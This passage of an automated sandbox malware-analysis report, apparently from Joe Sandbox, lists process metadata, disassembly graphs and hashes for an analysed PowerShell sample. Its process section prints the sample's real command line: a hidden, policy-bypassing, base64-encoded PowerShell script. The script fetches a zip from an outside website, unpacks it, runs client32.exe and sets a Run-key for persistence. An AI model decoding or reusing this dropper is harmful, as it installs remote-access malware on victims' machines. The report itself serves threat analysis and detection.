                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7fcd70000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:2
                Start time:09:33:51
                Start date:28/05/2023
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA6ACcALAAnAHcALgAnACwAJwBwAGgAcAAnACwAJwByAG0AcwAvACcALAAnAC8ALwB1AHMAaABlAHIAcwBrAGUAJwAsACcAbgB5AGEALgBjAG8ALgBrAGUAJwAsACcALwBmAG8AJwAsACcAdgBpAGUAJwApADsAIAAkAHsAUgBuAGAAVQBtAH0APQAuACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAewBSAFIAbgBgAFUATQB9AD0ALgAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAFIAYQBuAGQAbwBtACcALAAnAEcAZQAnACwAJwB0AC0AJwApACAALQBtAGkAbgBpAG0AdQBtACAAMQAwADIANAAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOQA5ADkAOwAgACQAewBDAEgAYABSAFMAfQA9ACgAIgB7ADkAfQB7ADcAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAMAB9AHsAMwB9AHsANgB9AHsAMQB9AHsAMgB9AHsAOAB9ACIAIAAtAGYAJwBwAHMAJwAsACcAWAAnACwAJwBZACcALAAnAEoAJwAsACcAdAB1AHYAdwB4ACcALAAnAG4AbwAnACwAJwBLAEwATQBOAE8AUABSAFMAVABVAFYAVwAnACwAJwBtACcALAAnAFoAJwAsACcAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAJwAsACcAeQB6AEEAQgBDAEQARQBGAEcASABJACcAKQA7ACAAJAB7AHIAYABTAHQAUgB9AD0AJwAnADsAIAAkAHsAUgBgAEEATgB9AD0AJgAoACIAewAzAH0AewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAGMAdAAnACwAJwBlACcALAAnAGoAJwAsACcATgBlAHcALQBPAGIAJwApACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9AHsAMwB9ACIALQBmACAAJwBTAHkAJwAsACcAZQBtAC4AUgBhAG4AZABvACcALAAnAHMAdAAnACwAJwBtACcAKQA7ACAAZgBvAHIAIAAoACQAewBJAH0APQAwADsAIAAkAHsASQB9ACAALQBsAHQAIAAkAHsAcgBgAE4AVQBtAH0AOwAgACQAewBpAH0AKwArACkAIAB7ACQAewByAFMAYABUAHIAfQArAD0AJAB7AEMAaABgAFIAUwB9AFsAJAB7AFIAYABBAG4AfQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0ACcALAAnAG4AZQB4ACcAKQAuAEkAbgB2AG8AawBlACgAMAAsACAAJAB7AGMAYABIAFIAUwB9AC4AIgBMAGAARQBuAEcAdABIACIAKQBdAH0AOwAgACQAewBSAFoAYABJAHAAfQA9ACQAewByAGAAcwB0AFIAfQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHAAJwAsACcALgB6AGkAJwApADsAIAAkAHsAUABBAGAAVABoAH0APQAkAHsAZQBuAGAAVgBgADoAYQBQAFAAZABhAHQAYQB9ACsAJwBcACcAKwAkAHsAcgBaAGAAaQBwAH0AOwAgACQAewBQAGAAegBJAHAAfQA9ACQAewBFAE4AVgA6AGEAYABwAGAAcABkAGEAdABBAH0AKwAoACgAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAJwB7ADAAfQAnACwAJwBPAE4ARQBOADAAVABFACcALAAnAHUAcABkAGEAdABlAF8AJwApACkAIAAtAGYAWwBjAEgAQQByAF0AOQAyACkAKwAkAHsAUgBSAG4AYABVAG0AfQA7ACAAJgAoACIAewAyAH0AewAzAH0AewAxAH0AewA0AH0AewA1AH0AewAwAH0AIgAgAC0AZgAgACcAcgAnACwAJwBuACcALAAnAFMAdABhAHIAdAAtAEIAJwAsACcAaQB0AHMAVAByAGEAJwAsACcAcwAnACwAJwBmAGUAJwApACAALQBTAG8AdQByAGMAZQAgACQAewBsAGkAYABOAEsAfQAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJAB7AFAAYQBgAFQAaAB9ADsAIAAuACgAIgB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcAZQAnACwAJwB4AHAAYQAnACwAJwBlACcALAAnAG4AZAAtAGEAcgBjAGgAaQB2ACcAKQAgAC0AcABhAHQAaAAgACQAewBwAGEAYABUAEgAfQAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuAHAAYQB0AGgAIAAkAHsAcABgAHoASQBQAH0AOwAgACQAewBmAGAATwBsAGQAfQA9AC4AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBlAG0AJwAsACcAdAAtAEkAdAAnACwAJwBHAGUAJwApACAAJAB7AHAAYAB6AEkAUAB9ACAALQBGAG8AcgBjAGUAOwAgACQAewBGAG8AYABsAEQAfQAuACIAYQB0AFQAYABSAEkAYgB1AGAAVABgAGUAcwAiAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAnAEgAaQBkAGQAZQAnACkAOwAgAC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAFIAZQBtAG8AJwAsACcAdgAnACwAJwBlAC0ASQB0AGUAbQAnACkAIAAtAHAAYQB0AGgAIAAkAHsAcABhAGAAVABoAH0AOwAgACYAKAAnAGMAZAAnACkAIAAkAHsAcABgAFoAaQBQAH0AOwAgACYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcgB0ACcALAAnAHMAdABhACcAKQAgACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACcAdAAzACcALAAnAHgAZQAnACwAJwAyAC4AZQAnACwAJwBjAGwAaQBlAG4AJwApADsAIAAkAHsAZgBTAGAAVABSAH0APQAkAHsAcABgAFoAaQBQAH0AKwAoACgAKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACcAMwAyAC4AZQB4AGUAJwAsACcAaQBlAG4AdAAnACwAJwBOAGMAbAAnACwAJwBUADcAJwApACkAIAAgAC0AQwBSAGUAUABMAEEAYwBlACAAKABbAGMAaABBAHIAXQA4ADQAKwBbAGMAaABBAHIAXQA1ADUAKwBbAGMAaABBAHIAXQA3ADgAKQAsAFsAYwBoAEEAcgBdADkAMgApADsAIAAkAHsAcgBgAE4AbQB9AD0AKAAiAHsAMwB9AHsAMAB9AHsAMgB9AHsAMQB9AHsANAB9ACIAIAAtAGYAIAAnAE4ARQBOACcALAAnAEUAdQBwAGQAYQB0AGUAJwAsACcAMABUACcALAAnAE8AJwAsACcAXwAnACkAKwAkAHsAcgBgAFIATgBgAFUAbQB9ADsAIAAmACgAIgB7ADAAfQB7ADEAfQB7ADQAfQB7ADMAfQB7ADIAfQAiAC0AZgAgACcATgBlAHcALQBJAHQAZQBtACcALAAnAFAAcgBvACcALAAnAHIAdAB5ACcALAAnAGUAJwAsACcAcAAnACkAIAAtAFAAYQB0AGgAIAAoACgAKAAiAHsAMQB9AHsAOQB9AHsAOAB9AHsANgB9AHsAMwB9AHsAMQAwAH0AewAwAH0AewA3AH0AewA0AH0AewAyAH0AewA1AH0AIgAtAGYAIAAnAHoAVwAnACwAJwBIACcALAAnAG4AUABjACcALAAnAEYAVABXAEEAUgBFAFAAYwB6AE0AaQBjAHIAbwBzACcALAAnAHIAcgBlAG4AdABWAGUAcgBzAGkAbwAnACwAJwB6AFIAdQBuACcALAAnAFMATwAnACwAJwBpAG4AZABvAHcAcwBQAGMAegBDAHUAJwAsACcAUABjAHoAJwAsACcASwBDAFUAOgAnACwAJwBvAGYAdABQAGMAJwApACkALgAiAHIARQBwAEwAYABBAGMARQAiACgAKABbAEMAaABBAFIAXQA4ADAAKwBbAEMAaABBAFIAXQA5ADkAKwBbAEMAaABBAFIAXQAxADIAMgApACwAWwBzAFQAUgBJAG4AZwBdAFsAQwBoAEEAUgBdADkAMgApACkAIAAtAE4AYQBtAGUAIAAkAHsAUgBgAE4AbQB9ACAALQBWAGEAbAB1AGUAIAAkAHsAZgBTAGAAVABSAH0AIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAJwBnACcALAAnAG4AJwAsACcAUwB0AHIAaQAnACkAOwA=
                Imagebase:0x7ff7fbaf0000
                File size:447488 bytes
                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                Disassembly

                Reset < >

                  Executed Functions

                  Function 00007FF9A56D1775 Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.480623123.00007FF9A56D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A56D0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_7ff9a56d0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a8192baa65028a7639db6535033d9d6e65af33cc21e154c1d673825322934023
                  • Instruction ID: 7ab63fc7ed03047fbe77e21d7ba0cc5891868be808b7608fac3c656a561e3902
                  • Opcode Fuzzy Hash: a8192baa65028a7639db6535033d9d6e65af33cc21e154c1d673825322934023
                  • Instruction Fuzzy Hash: 7E01677111CB0C4FD744EF0CE451AA6B7E0FB95364F10056EE58AC7661DA36E881CB45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:7.8%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:8
                  Total number of Limit Nodes:0
                  execution_graph 12741 7ff9a571acd0 12742 7ff9a571acde 12741->12742 12743 7ff9a571ad1b 12742->12743 12744 7ff9a571ace8 RtlDecodePointer 12742->12744 12744->12743 12737 7ff9a5709b70 12738 7ff9a5709b7e 12737->12738 12739 7ff9a5709b88 RtlEncodePointer 12738->12739 12740 7ff9a5709bbb 12738->12740 12739->12740

                  Executed Functions

                  Function 00007FF9A570D3C5 Relevance: 1.0, Instructions: 988COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 463 7ff9a570d3c5-7ff9a570d3cf 464 7ff9a570d411-7ff9a570d47c call 7ff9a5708978 463->464 465 7ff9a570d3d1-7ff9a570d410 463->465 473 7ff9a570d47e-7ff9a570d4a1 464->473 474 7ff9a570d4a8-7ff9a570d4cf 464->474 465->464 473->474 479 7ff9a570d4e0-7ff9a570d4e5 474->479 480 7ff9a570d4d1-7ff9a570d4df 474->480 481 7ff9a570d4e7-7ff9a570d500 479->481 482 7ff9a570d508-7ff9a570d515 479->482 488 7ff9a570d502-7ff9a570d505 481->488 489 7ff9a570d553-7ff9a570d568 call 7ff9a57079f8 481->489 484 7ff9a570d51b-7ff9a570d525 482->484 485 7ff9a570dc65-7ff9a570dc6d 482->485 490 7ff9a570d56a 484->490 491 7ff9a570d527-7ff9a570d543 call 7ff9a57079f8 484->491 486 7ff9a570dc6f-7ff9a570dc77 485->486 487 7ff9a570dcc6-7ff9a570dcd5 485->487 492 7ff9a570dc79-7ff9a570dc8a 486->492 493 7ff9a570dca8-7ff9a570dcbf call 7ff9a5708a88 486->493 488->482 500 7ff9a570d571-7ff9a570d57b 489->500 496 7ff9a570d56f 490->496 491->496 502 7ff9a570d545-7ff9a570d54f 491->502 506 7ff9a570dc8c-7ff9a570dc95 call 7ff9a5708a78 492->506 507 7ff9a570dca3 492->507 493->487 496->500 504 7ff9a570d68c-7ff9a570d68f 500->504 505 7ff9a570d581-7ff9a570d58b 500->505 502->490 508 7ff9a570d551-7ff9a570d552 502->508 512 7ff9a570d77a-7ff9a570d77c 504->512 513 7ff9a570d695-7ff9a570d69f 504->513 505->490 510 7ff9a570d58d-7ff9a570d5a8 505->510 516 7ff9a570dc9a-7ff9a570dca1 506->516 507->493 508->489 521 7ff9a570d5aa-7ff9a570d5d1 510->521 522 7ff9a570d5d7-7ff9a570d5ef 510->522 514 7ff9a570d782-7ff9a570d834 512->514 515 7ff9a570d928-7ff9a570d93b 512->515 513->490 517 7ff9a570d6a5-7ff9a570d6cf 513->517 548 7ff9a570d86e-7ff9a570d872 514->548 549 7ff9a570d836-7ff9a570d840 514->549 525 7ff9a570d93d-7ff9a570d960 515->525 526 7ff9a570d967-7ff9a570d9c9 515->526 516->487 531 7ff9a570d6fb-7ff9a570d71d 517->531 532 7ff9a570d6d1-7ff9a570d6f4 517->532 521->504 521->522 535 7ff9a570d61b-7ff9a570d687 522->535 536 7ff9a570d5f1-7ff9a570d614 522->536 525->526 552 7ff9a570d9cf-7ff9a570dad1 526->552 553 7ff9a570dad6-7ff9a570db28 526->553 555 7ff9a570d724-7ff9a570d772 531->555 532->531 535->512 536->535 550 7ff9a570d88f-7ff9a570d893 548->550 551 7ff9a570d874-7ff9a570d887 548->551 549->490 556 7ff9a570d846-7ff9a570d86c 549->556 558 7ff9a570d895-7ff9a570d89f 550->558 559 7ff9a570d8d7-7ff9a570d8e1 550->559 551->550 590 7ff9a570dc4d-7ff9a570dc5f 552->590 572 7ff9a570dbab 553->572 573 7ff9a570db2e-7ff9a570db56 553->573 555->512 556->550 558->490 564 7ff9a570d8a5-7ff9a570d8d5 558->564 559->490 566 7ff9a570d8e7-7ff9a570d90f 559->566 578 7ff9a570d917-7ff9a570d923 564->578 566->578 581 7ff9a570dbb0-7ff9a570dbb4 572->581 593 7ff9a570dc29-7ff9a570dc3b 573->593 594 7ff9a570db5c-7ff9a570db7a 573->594 578->590 583 7ff9a570dbd5-7ff9a570dbd9 581->583 584 7ff9a570dbb6-7ff9a570dbd3 581->584 586 7ff9a570dbdb-7ff9a570dbfb 583->586 587 7ff9a570dbfd-7ff9a570dc16 583->587 584->583 607 7ff9a570dc1d-7ff9a570dc22 586->607 587->607 590->484 590->485 593->590 594->581 599 7ff9a570db7c-7ff9a570dba9 594->599 599->583 607->593
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9a872d1df9e5f7e1fa341b8a418d0431d123aac15be946d79755914aa33dfa1b
                  • Instruction ID: 624ea82b8e0de452c7a383c671062284e5ad46abfd89052f39da0dfb4d1b2f7c
                  • Opcode Fuzzy Hash: 9a872d1df9e5f7e1fa341b8a418d0431d123aac15be946d79755914aa33dfa1b
                  • Instruction Fuzzy Hash: 2C72B131A18A098FDB49EB68D4946F977E2FF5A314F10417DD44EE7292CE78B842CB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A5707CA2 Relevance: .7, Instructions: 741COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 615 7ff9a5707ca2-7ff9a5707cf6 call 7ff9a5707908 623 7ff9a5707cfc-7ff9a5707d04 615->623 624 7ff9a5707df9-7ff9a5707e6b 615->624 626 7ff9a5707d06-7ff9a5707d0e 623->626 627 7ff9a5707d2a-7ff9a5707d32 623->627 660 7ff9a5707e6d-7ff9a5707ec8 624->660 661 7ff9a5707ecc-7ff9a5707eef 624->661 626->627 628 7ff9a5707d10-7ff9a5707d24 626->628 629 7ff9a5707d34-7ff9a5707d3c 627->629 630 7ff9a5707d3e-7ff9a5707d46 627->630 628->627 632 7ff9a5707f28-7ff9a5707f50 628->632 629->630 633 7ff9a5707d92-7ff9a5707d9a 629->633 634 7ff9a5708057-7ff9a5708060 630->634 635 7ff9a5707d4c-7ff9a5707d8c 630->635 647 7ff9a5707f52-7ff9a5707f86 632->647 639 7ff9a5707dec-7ff9a5707df8 633->639 640 7ff9a5707d9c-7ff9a5707ddc 633->640 642 7ff9a570815d-7ff9a570817f 634->642 635->633 635->634 640->639 662 7ff9a5707dde-7ff9a5707de6 640->662 665 7ff9a5708186-7ff9a57081b8 642->665 664 7ff9a5707f87-7ff9a5707f9a 647->664 660->661 669 7ff9a5707f26 661->669 670 7ff9a5707ef1 661->670 662->639 662->665 678 7ff9a5707f9c-7ff9a5707ff7 664->678 679 7ff9a5707ffb-7ff9a5708050 664->679 665->642 680 7ff9a57081ba-7ff9a57081f6 665->680 669->632 669->664 670->647 674 7ff9a5707ef3-7ff9a5707f21 670->674 674->669 678->679 679->634 699 7ff9a570822a-7ff9a5708357 call 7ff9a5707918 call 7ff9a5707928 680->699 700 7ff9a57081f8-7ff9a5708229 680->700 720 7ff9a5708359-7ff9a570835c 699->720 721 7ff9a570835f-7ff9a570839a call 7ff9a5707938 699->721 700->699 720->721 724 7ff9a57083a0-7ff9a57083de call 7ff9a5707938 721->724 725 7ff9a5708422-7ff9a5708423 721->725 724->725 731 7ff9a57083e0-7ff9a5708420 call 7ff9a5707938 724->731 726 7ff9a5708425-7ff9a5708428 725->726 729 7ff9a570842a-7ff9a5708436 call 7ff9a5707948 726->729 730 7ff9a5708490 726->730 737 7ff9a570843b-7ff9a570843d 729->737 733 7ff9a5708495-7ff9a570849c 730->733 731->726 735 7ff9a570849e-7ff9a57084a2 call 7ff9a5707958 733->735 736 7ff9a57084a7-7ff9a57084b0 733->736 735->736 740 7ff9a570846a 737->740 741 7ff9a570843f-7ff9a5708452 call 7ff9a5707948 737->741 742 7ff9a570846c-7ff9a570846e 740->742 741->740 748 7ff9a5708454-7ff9a5708468 call 7ff9a5707948 741->748 745 7ff9a5708489-7ff9a570848e 742->745 746 7ff9a5708470-7ff9a5708474 742->746 745->733 746->733 747 7ff9a5708476-7ff9a570847a 746->747 747->733 749 7ff9a570847c-7ff9a5708480 747->749 748->742 749->733 751 7ff9a5708482-7ff9a5708487 749->751 751->733
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 06350e50e8833fc3b503b33ebb0072517c7d8a1d4e1a62adc2ef0a36daa3db18
                  • Instruction ID: 0201c3d2dc36701318982e6df3826a0744821e5d305d260e5b7e81ccb663d3fc
                  • Opcode Fuzzy Hash: 06350e50e8833fc3b503b33ebb0072517c7d8a1d4e1a62adc2ef0a36daa3db18
                  • Instruction Fuzzy Hash: FD320531B0DA4A4FEB99DB3894557B9BBD1FF8A710F04017ED48DE72D2CE6868428341
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A57080AF Relevance: .4, Instructions: 404COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cffd0279b31c1ceb0ffe1b5cdf0b09e1d722fcd40c4cd050c156d62305501451
                  • Instruction ID: 75ec7e5a94938480b1ba8f17117ea6b8942d2a5dcb6109c82be7ea4a77f82d82
                  • Opcode Fuzzy Hash: cffd0279b31c1ceb0ffe1b5cdf0b09e1d722fcd40c4cd050c156d62305501451
                  • Instruction Fuzzy Hash: FBD1D631B1CA495FEF98DF2894557B9BBE1FF9A700F04017EE48DE3292CE68A8418745
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A5709A19 Relevance: 1.7, APIs: 1, Instructions: 164COMMON
                  Download Yara Rule

                  Control-flow Graph

                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d922986d412800650ed709a12714a89fb89d8b393698b4ec7a64891ffa366560
                  • Instruction ID: 438054fb830a8e3dfab47b32238f79927f293fa005cb55cc4c3f5d0d4ebed791
                  • Opcode Fuzzy Hash: d922986d412800650ed709a12714a89fb89d8b393698b4ec7a64891ffa366560
                  • Instruction Fuzzy Hash: A04127F1A0DA594FEB98D72C94457B577E1FF96720F04427AC08DE3192DE68AC42C781
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A571AC51 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 128 7ff9a571ac51-7ff9a571ac5d 129 7ff9a571ac60-7ff9a571ac71 128->129 130 7ff9a571ac5f 128->130 131 7ff9a571ac74-7ff9a571acbf 129->131 132 7ff9a571ac73 129->132 130->129 135 7ff9a571acde-7ff9a571ace6 131->135 136 7ff9a571acc1-7ff9a571accd 131->136 132->131 137 7ff9a571ad2c-7ff9a571ad43 135->137 138 7ff9a571ace8-7ff9a571ad19 RtlDecodePointer 135->138 136->135 140 7ff9a571ad1b 138->140 141 7ff9a571ad21-7ff9a571ad2a 138->141 140->141 141->137
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e1fed002bfcf253b554c5c6c733bfcb6654e272dde0dfed95ccc0391d879237
                  • Instruction ID: 939036c8204e500885c0fa3cbdbdc2d6c74c06d62db4a84fbb660ca47a68715d
                  • Opcode Fuzzy Hash: 1e1fed002bfcf253b554c5c6c733bfcb6654e272dde0dfed95ccc0391d879237
                  • Instruction Fuzzy Hash: B7313470A0DA8C5FEB59DB6888097B6BFE0FB53321F04416FD0C9D2152DAA86816C7D1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A571ACD0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 148 7ff9a571acd0-7ff9a571ace6 150 7ff9a571ad2c-7ff9a571ad43 148->150 151 7ff9a571ace8-7ff9a571ad19 RtlDecodePointer 148->151 152 7ff9a571ad1b 151->152 153 7ff9a571ad21-7ff9a571ad2a 151->153 152->153 153->150
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID: DecodePointer
                  • String ID:
                  • API String ID: 3527080286-0
                  • Opcode ID: 0b267759d266a46ec3f04d553b1714cbeb5a1f27609a79466841cbc7dec941af
                  • Instruction ID: aa700cda2d01b7bafb9d5a5118432ef5d818649220c17e98c2cb07ed625a9b8b
                  • Opcode Fuzzy Hash: 0b267759d266a46ec3f04d553b1714cbeb5a1f27609a79466841cbc7dec941af
                  • Instruction Fuzzy Hash: 58015E3160CA4D8EE758DB5CD009BA5BBE0F759322F00822AC049C3551D7B9645ACBD1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A5709B70 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 142 7ff9a5709b70-7ff9a5709b86 144 7ff9a5709bcc-7ff9a5709be3 142->144 145 7ff9a5709b88-7ff9a5709bb9 RtlEncodePointer 142->145 146 7ff9a5709bbb 145->146 147 7ff9a5709bc1-7ff9a5709bca 145->147 146->147 147->144
                  APIs
                  Memory Dump Source
                  • Source File: 00000002.00000002.463510453.00007FF9A5700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5700000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5700000_powershell.jbxd
                  Similarity
                  • API ID: EncodePointer
                  • String ID:
                  • API String ID: 2118026453-0
                  • Opcode ID: 7cb0c9c64cbb73a67b3ff152ac9da7ab74c7c5dc75c04196a1ca98271301bf27
                  • Instruction ID: 170bae145e90a190b08e3381845a1551bbe2d8777bcb4d508ff75b95f466fda5
                  • Opcode Fuzzy Hash: 7cb0c9c64cbb73a67b3ff152ac9da7ab74c7c5dc75c04196a1ca98271301bf27
                  • Instruction Fuzzy Hash: 0C019E7160CA088EEB58DB5CD40ABF8BBE0FB55332F00822EC059D3551D7B96055CB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00007FF9A5AD05ED Relevance: .5, Instructions: 548COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1013 7ff9a5ad05ed-7ff9a5ad0679 1016 7ff9a5ad0927-7ff9a5ad09b7 1013->1016 1017 7ff9a5ad067f-7ff9a5ad0689 1013->1017 1046 7ff9a5ad09be-7ff9a5ad09cf 1016->1046 1047 7ff9a5ad09b9 1016->1047 1018 7ff9a5ad06a2-7ff9a5ad06a7 1017->1018 1019 7ff9a5ad068b-7ff9a5ad06a0 1017->1019 1022 7ff9a5ad08c4-7ff9a5ad08cc 1018->1022 1023 7ff9a5ad06ad-7ff9a5ad06b0 1018->1023 1019->1018 1027 7ff9a5ad08ce 1022->1027 1025 7ff9a5ad06c7-7ff9a5ad06cb 1023->1025 1026 7ff9a5ad06b2-7ff9a5ad06bb 1023->1026 1025->1022 1034 7ff9a5ad06d1-7ff9a5ad0708 1025->1034 1026->1025 1032 7ff9a5ad08df-7ff9a5ad0924 1027->1032 1033 7ff9a5ad08d0-7ff9a5ad08de 1027->1033 1032->1016 1052 7ff9a5ad070a-7ff9a5ad072a 1034->1052 1053 7ff9a5ad072c 1034->1053 1050 7ff9a5ad09d6-7ff9a5ad0a90 1046->1050 1051 7ff9a5ad09d1 1046->1051 1047->1046 1049 7ff9a5ad09bb 1047->1049 1049->1046 1051->1050 1054 7ff9a5ad09d3 1051->1054 1056 7ff9a5ad072e-7ff9a5ad0730 1052->1056 1053->1056 1054->1050 1056->1022 1058 7ff9a5ad0736-7ff9a5ad0739 1056->1058 1058->1022 1061 7ff9a5ad073f-7ff9a5ad074a 1058->1061 1063 7ff9a5ad075a 1061->1063 1064 7ff9a5ad074c-7ff9a5ad0756 1061->1064 1068 7ff9a5ad075f-7ff9a5ad0774 1063->1068 1065 7ff9a5ad0776-7ff9a5ad0786 1064->1065 1066 7ff9a5ad0758 1064->1066 1072 7ff9a5ad0788-7ff9a5ad0791 1065->1072 1073 7ff9a5ad0793-7ff9a5ad07a9 1065->1073 1066->1068 1068->1065 1072->1073 1073->1063 1077 7ff9a5ad07ab-7ff9a5ad07b5 1073->1077 1079 7ff9a5ad07b7-7ff9a5ad07cc 1077->1079 1080 7ff9a5ad07ce-7ff9a5ad0844 1077->1080 1079->1080 1090 7ff9a5ad0846-7ff9a5ad084d 1080->1090 1091 7ff9a5ad084e 1080->1091 1092 7ff9a5ad084f-7ff9a5ad0880 1090->1092 1091->1092 1097 7ff9a5ad0882-7ff9a5ad089a 1092->1097 1098 7ff9a5ad089c-7ff9a5ad089e 1092->1098 1097->1098 1100 7ff9a5ad08a5-7ff9a5ad08b0 1098->1100 1100->1027 1103 7ff9a5ad08b2-7ff9a5ad08b5 1100->1103 1104 7ff9a5ad08b7-7ff9a5ad08be 1103->1104 1105 7ff9a5ad08bf-7ff9a5ad08c3 1103->1105 1104->1105
                  Memory Dump Source
                  • Source File: 00000002.00000002.469401737.00007FF9A5AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9A5AD0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_7ff9a5ad0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6b1e548556a88d314fce361cec698b29fbbf49efc738b22823d9f4b2f430ccb0
                  • Instruction ID: b730392a70b0880173b634d96a0790f3eabba63e735be38f89f4efb8dbb4105e
                  • Opcode Fuzzy Hash: 6b1e548556a88d314fce361cec698b29fbbf49efc738b22823d9f4b2f430ccb0
